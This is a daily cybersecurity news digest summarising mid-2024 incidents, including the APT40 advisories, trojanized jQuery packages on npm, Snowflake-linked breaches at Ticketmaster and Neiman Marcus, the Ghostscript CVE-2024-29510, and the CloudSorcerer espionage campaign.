Daily Brief

Microsoft China instructs employees to cease using Android devices due to login and authentication challenges. The company opts for providing Apple devices to its staff, leveraging iOS's ability to host necessary authentication apps. Google Mobile Services' unavailability in China cited as a key reason for the inability to use Android effectively in Microsoft's operations. Microsoft avoids using local Android app stores or sideloading apps, possibly due to security concerns. The decision reflects a broader reluctance from Microsoft to engage deeply with China's mobile ecosystem and local app market. This strategic shift comes amidst broader tensions, including accusations against China of unauthorized access to U.S. officials' emails. Microsoft's move away from Android in China potentially signifies larger geopolitical and tech industry ramifications.

The Australian Competition and Consumer Commission (ACCC) has issued a warning about scammers targeting previous scam victims with fraudulent recovery offers. Scammers exploit databases containing details of previous scam victims, using this information to pose as trusted entities like government agencies or legal firms. Victims are approached with offers to recover their lost funds for an upfront fee, a percentage of the recovered amount, or a purported tax. Personal information and remote access to devices are often requested under the guise of verifying identity or setting up digital wallets for cryptocurrency recovery. People over the age of 65 are particularly vulnerable to these scams, with reported losses totaling AU$2.9 million, not including unreported incidents. Tactics include fake testimonials, social media advertisements, and the creation of authentic-looking websites to lure victims. The ACCC emphasizes the difficulty of recovering money as scammers typically move funds offshore quickly. A mandatory code for banks and telecoms is under development in Australia to detect, prevent, and possibly compensate for such scams.

A multinational cybersecurity advisory warns about the China-linked espionage group, APT40, which rapidly exploits vulnerabilities in widely used software. APT40, active since at least 2013, has a history of cyber-attacks primarily in the Asia-Pacific, and is assessed to be part of China's Ministry of State Security. The group adapts quickly to exploit newly disclosed security flaws, including major vulnerabilities in Log4j, Atlassian Confluence, and Microsoft Exchange. Noteworthy techniques used by APT40 include using web shells for persistence, deploying outdated devices in their infrastructure to reroute traffic and avoid detection, and leveraging Australian websites for command and control operations. The group conducts in-depth reconnaissance on potential targets, operationalizing unpatched, end-of-life devices to exploit vulnerabilities swiftly. Mitigation recommendations include employing strong logging, enforcing multi-factor authentication, implementing a robust patch management strategy, and network segmentation to shield sensitive data against unauthorized access.

Unknown threat actors have implemented a supply chain attack by distributing trojanized versions of jQuery on npm, GitHub, and jsDelivr. Phylum's analysis highlights the sophisticated nature of the attack, where malware was hidden in the less utilized 'end' function of jQuery. A total of 68 malicious packages, named creatively to resemble legitimate ones, were introduced onto the npm registry from May 26 to June 23, 2024. The attackers manually assembled and published these packages, indicated by diverse naming conventions and inconsistent publishing time frames. Phylum discovered that the compromised 'end' function is designed to steal data entered in website forms and send it to a hacker-controlled remote URL. The trojanized jQuery has been found in a GitHub repository under the user "indexsc," which also hosts additional JavaScript files that utilize the malicious library. jsDelivr's automatic URL handling from GitHub to CDN is thought to be exploited by attackers to grant the malware higher legitimacy and easier passage through security frameworks. This event coincides with similar malicious activities detected on the Python Package Index (PyPI), which involve downloading malware based on the system's CPU architecture.

International law enforcement agencies, including from Australia, US, and UK, have issued an advisory on China's state-sponsored APT40. APT40, linked directly to China's Ministry of State Security, can develop and deploy exploits within hours of vulnerabilities being disclosed. The advisory details APT40’s focus on exploiting end-of-life or unpatched systems in their cyber operations. The group uses initial access through compromised devices, often in small businesses or home setups, to deploy further attacks. Techniques used by APT40 include leveraging web shells, searching for valid user credentials, and installing malware for data exfiltration. Highlighted vulnerabilities targeted by APT40 include flaws in Log4J, Atlassian Confluence, and Microsoft Exchange. Recommended mitigation strategies include regular patching, network segmentation, use of multifactor authentication, and disabling unused network services. The advisory stresses the rapid adaptation and operational speed of APT40, posing significant security challenges to vulnerable networks internationally.

Zotac inadvertently made customer return merchandise authorization (RMA) data accessible online due to a misconfiguration of their web folders. The exposed data included sensitive details such as customer names, addresses, contact information, and invoice specifics. The security mishap resulted from inadequate access permissions and the absence of a 'robots.txt' file to prevent search engine indexing. The issue was highlighted by a viewer of the GamersNexus YouTube tech channel, ultimately prompting an investigation into the data exposure. Zotac and GamersNexus have taken steps to notify affected partners and have started securing the exposed data, although some information may still be retrievable via Google Search. To mitigate further risk, Zotac disabled the document upload function on their RMA portal, requesting customers to instead email necessary documents. Customers who have used Zotac's RMA service should assume their personal information may have been exposed and take appropriate precautions.

Hackers known as 'Sp1derHunters' released almost 39,000 print-at-home Ticketmaster tickets for upcoming concerts including major artists like Pearl Jam and Foo Fighters. The leaked data originated from a data theft at Snowflake, where Ticketmaster's data was compromised. The theft involved databases of 165 organizations due to stolen credentials facilitated by malware. Ticketmaster was extorted by hackers demanding up to $2 million to prevent further leaks; however, they asserted that their SafeTix technology nullifies the risk by frequently updating barcode information. Despite Ticketmaster's claims, Sp1derHunters pointed out that the barcodes for print-at-home tickets cannot be refreshed, thus challenging Ticketmaster's security measures. The leaked data includes detailed information needed to create valid tickets, raising concerns over potential fraudulent entry into events. The incident highlights ongoing vulnerabilities in digital ticketing processes and challenges in securing large databases, potentially affecting customer trust and corporate reputation. Response from Ticketmaster regarding future actions for the affected tickets remains unconfirmed.

Neiman Marcus experienced a significant data breach in May 2024, with more than 31 million customer email addresses exposed. Data security expert Troy Hunt confirmed the authenticity of the exposed data, which includes names, contact info, transaction data, and sensitive financial and personal data. Initially, Neiman Marcus reported to the Maine Attorney General that only 64,472 were affected, but further analysis revealed millions affected. The breach was part of the broader Snowflake data theft attacks, targeting multiple companies due to weak multi-factor authentication. Data put up for sale included millions of gift card numbers and detailed transaction records, with hackers initially demanding a ransom. A joint investigation by Snowflake, Mandiant, and CrowdStrike identified the financially motivated threat actor UNC5537, which exploited security vulnerabilities targeting multiple organizations.

Avast has identified a cryptographic vulnerability in the DoNex ransomware family, enabling the creation of a free file decryptor. This tool counters several variants of DoNex, previously known as DarkRace and Muse, which earlier masqueraded under the Lockbit 3.0 name. The decryptor has been discreetly provided to affected entities in collaboration with law enforcement since March 2024 to avoid alerting cybercriminals. Following the public revelation of the cryptographic flaw at the Recon 2024 conference, Avast released the decryptor tool publicly. DoNex's recent activities primarily targeted the United States, Italy, and Belgium but maintained a global presence. The ransomware employs a ChaCha20 symmetric key for encrypting files, which when exploited due to its crypto flaws, can aid in file recovery without a ransom. Avast recommends users to use the 64-bit version of the decryptor and to execute it with admin rights, needing a pair of encrypted and original files to function. Caution is advised to back up encrypted files before decryption to prevent potential data loss.

A remote code execution (RCE) vulnerability in Ghostscript is actively being exploited, affecting many Linux-based systems. Ghostscript is integral to document conversion tools like ImageMagick, LibreOffice, and CUPS, and is pre-installed on numerous Linux distributions. Identified as CVE-2024-29510, the flaw bypasses the -dSAFER sandbox, allowing unauthorized command execution and file operations. Attackers exploit this vulnerability by disguising malicious EPS files as harmless JPG images to gain shell access to systems. Despite a patch being available since May, many systems remain vulnerable; updating to Ghostscript v10.03.1 or applying vendor-supplied patches is critical. The vulnerability's exploitation poses a significant risk to web applications and other services that incorporate document conversion features using Ghostscript. Security professionals can use a provided Postscript file to check system vulnerability to these specific attacks.

CloudSorcerer, an APT group, primarily targets Russian government entities using cloud-based command-and-control. This newly identified cyber espionage campaign leverages services like Microsoft Graph, Yandex Cloud, and Dropbox for stealth monitoring and data exfiltration. Kaspersky discovered these cyberattacks in May 2024, noting the innovative use of malware with features similar yet distinct from the earlier known CloudWizard. The malware employs various evasion tactics, adjusting its behavior dynamically based on its host process to avoid detection. Initial intrusion techniques remain unclear, but post-access strategies include utilizing a C-based executable for backdoor access, data collection, and further malicious activities. CloudSorcerer makes initial contact with C2 servers via GitHub, using it as a dead drop resolver before moving to more direct cloud service communications. Sophistication in inter-process communications via Windows pipes suggests high levels of technical sophistication in avoiding common cybersecurity defenses.

The group named CloudSorcerer executes cyberespionage against Russian government entities by exploiting public cloud services. Discovered by Kaspersky in May 2024, this advanced persistent threat (APT) employs custom malware leveraging legitimate cloud platforms for control and data storage. The unique malware uses different tactics depending on the host application, such as "mspaint.exe" or "msiexec.exe," to manage command and control (C2) communications or execute malicious activities. Initial contact by the malware is through a GitHub repository, which facilitates further C2 operations through various cloud services like Microsoft Graph, Yandex Cloud, or Dropbox. The malware ensures stealth and efficacy by using Windows pipes for inter-process communications, adapting to the specific environment of the infected machine. CloudSorcerer can conduct extensive reconnaissance on the infected system, gathering data like computer name, username, and system details. Kaspersky emphasizes the sophistication of the attacks due to the malware's ability to dynamically adapt and obfuscate data transmission. Detection signatures and methods (IoCs and Yara rules) have been made available by Kaspersky for identifying and mitigating CloudSorcerer threats.

Recorded Future's analysis revealed 3,300 users linked to child sexual abuse material (CSAM) sites through malware logs published on the dark web. Approximately 4.2% of these users had credentials for multiple CSAM sources, highlighting extensive criminal behavior. Malware variants such as Kematian Stealer, Neptune Stealer, and others increasingly target sensitive information like credentials and payment data, often ending up for sale on the dark web. The malware distribution channels include phishing, spam, cracked software, fake updates, SEO poisoning, and malvertising. The investigation utilized stolen credentials to identify and unmask individuals accessing known CSAM domains, leading to the identification of three major offenders. Recorded Future noted significant user counts from countries like Brazil, India, and the U.S., attributing high figures possibly to dataset sourcing biases. Insights from malware logs are shared with law enforcement to aid in tracking and investigating dark web child exploitation networks.

Microsoft SwiftKey's support site certificate expired on June 10, leading to security warnings for users. SwiftKey, a predictive keyboard app bought by Microsoft in 2016, still has a significant user base despite competing improvements by Apple and Google. The certificate expiry resulted in browser warnings that deterred users from accessing the support site, displaying concerns about the site’s security. The recent attempt to rebrand SwiftKey with "Copilot" features in February highlights ongoing development, despite this oversight. Microsoft's history of certificate management issues is noted, with similar problems occurring recently with Microsoft 365. Microsoft did not include a solution for the expired certificate in the most recent update on June 14, focused only on general improvements. The lapse in certificate renewal has raised questions regarding Microsoft's commitment to maintaining support infrastructure for its products.

Roblox reported a data breach affecting attendees of its Developer Conferences spanning 2022 to 2024. The breach originated from FNTech, a third-party vendor responsible for conference registration, where unauthorized access to data was gained. Exposed data includes full names, email addresses, and IP addresses of conference participants. The Have I Been Pwned database has verified and added 10,386 affected email addresses, 63% of which were not previously compromised. Prior data leaks related to Roblox in 2023 involve nearly 4,000 developer accounts from a 2021 incident, underscoring ongoing security challenges. The exposure does not pose immediate threats but increases the potential for targeted phishing attacks against developers. Roblox assures enhancements in their security protocols to prevent such occurrences in the future.